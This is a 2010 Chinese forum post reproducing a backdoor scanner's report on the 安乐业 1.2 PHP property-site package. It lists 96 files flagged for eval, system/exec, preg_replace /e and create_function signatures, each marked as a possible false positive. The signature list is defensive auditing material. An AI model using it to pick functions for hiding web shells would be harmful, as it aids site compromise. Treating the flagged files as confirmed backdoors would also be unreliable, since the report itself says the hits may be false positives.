源码论坛公告:本站是一个交流学习建站资源的社区论坛,旨在交流学习源码脚本等资源技术,欢迎大家投稿发言! 【点击此处将锦尚放在桌面

源码论坛,商业源码下载,尽在锦尚中国商业源码论坛

 找回密码
 会员注册

QQ登录

只需一步,快速开始

查看: 4487|回复: 10
打印 上一主题 下一主题

安乐业检测报告

  [复制链接]

8

主题

843

帖子

210

金币

任意通会员(年费)

积分
1091
跳转到指定楼层
1#
发表于 2010-3-22 12:15:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
检测报告

检测时间:2010-3-22 12:07:23开始,2010-3-22 12:07:53结束!
检测结果:一共检查文件夹460个,文件4,424个,符合扫描条件(php)文件1,381个。本次扫描共发现严重可疑文件夹0个,可疑文件96个,其中严重可疑文件0个(严重可疑点合计0处)!

文件路径 特征码 描述 创建/修改时间
E:\Download\安乐业1.2\fangke\admin\borough\updateCheck.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-3-16 4:13:30
E:\Download\安乐业1.2\fangke\bbs\image.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\memcp.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:46
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\notice.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:46
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\pm.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:47
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\stats.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:47
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\task.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:47
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\viewthread.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:49
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\addons.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\admingroups.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\attach.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\checktools.inc.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\creditwizard.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\db.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\db.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\forums.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\forums.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\global.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\jswizard.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\jswizard.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\medals.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\members.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\members.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\misc.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\moderate.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\plugins.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\plugins.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\project.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\prune.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\recyclebin.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\search.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\settings.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\smilies.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\styles.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\styles.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\threads.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\usergroups.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\zip.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\archiver\index.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\cache_usergroups.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\cache_viewthread.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_2.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_3.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_4.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_5.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_6.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_7.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_8.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\include\cache.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\cache.func.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\cache.func.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\discuzcode.func.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\editpost.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\global.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\global.func.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\image.class.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\misc.func.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\newreply.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\post.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\request.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\sendmail.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\template.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\template.func.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\manyou\api\class\MyBase.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:47:42
E:\Download\安乐业1.2\fangke\bbs\modcp\forums.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:46
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\modcp\members.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:46
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\plugins\dps_postawards\postawards.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:46
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\templates\default\admincp.lang.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:47
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\uc_client\client.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:48
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\uc_client\client.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:48
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\uc_client\model\base.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:48
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\wap\include\global.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:49
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\common\apps\insert.ads.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:49
2010-3-17 18:59:50
E:\Download\安乐业1.2\fangke\common\lib\classes\json.class.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:50
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\classes\SendMail.class.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:50
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\classes\SendMail.class.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:50
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\classes\Services_JSON.class.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:50
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\classes\Util.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:50
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\FCKeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts\spellchecker.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:51
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\phpExcel\PHPExcel\Calculation.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:56
2010-3-16 4:18:46
E:\Download\安乐业1.2\fangke\common\lib\phpExcel\PHPExcel\Calculation\Functions.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:56
2010-3-16 4:18:46
E:\Download\安乐业1.2\fangke\common\lib\phpExcel\PHPExcel\Shared\XMLWriter.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:48
E:\Download\安乐业1.2\fangke\common\lib\phpExcel\PHPExcel\Writer\Excel5\Workbook.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\Smarty.class.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\Smarty.class.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\Smarty_Compiler.class.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.get_php_resource.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.is_secure.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.is_secure.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.is_trusted.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.is_trusted.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.read_cache_file.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.write_cache_file.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\plugins\function.eval.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\plugins\function.mailto.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\plugins\function.math.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\plugins\modifier.regex_replace.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\conf\adminMenu.cfg.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:22:12
E:\Download\安乐业1.2\fangke\uc\lib\template.class.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:06:06
2010-3-16 4:30:26
E:\Download\安乐业1.2\fangke\uc\model\base.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:06:06
2010-3-16 4:30:26
E:\Download\安乐业1.2\fangke\uc_client\client.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:06:07
2010-3-16 4:30:26
E:\Download\安乐业1.2\fangke\uc_client\client.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:07
2010-3-16 4:30:26
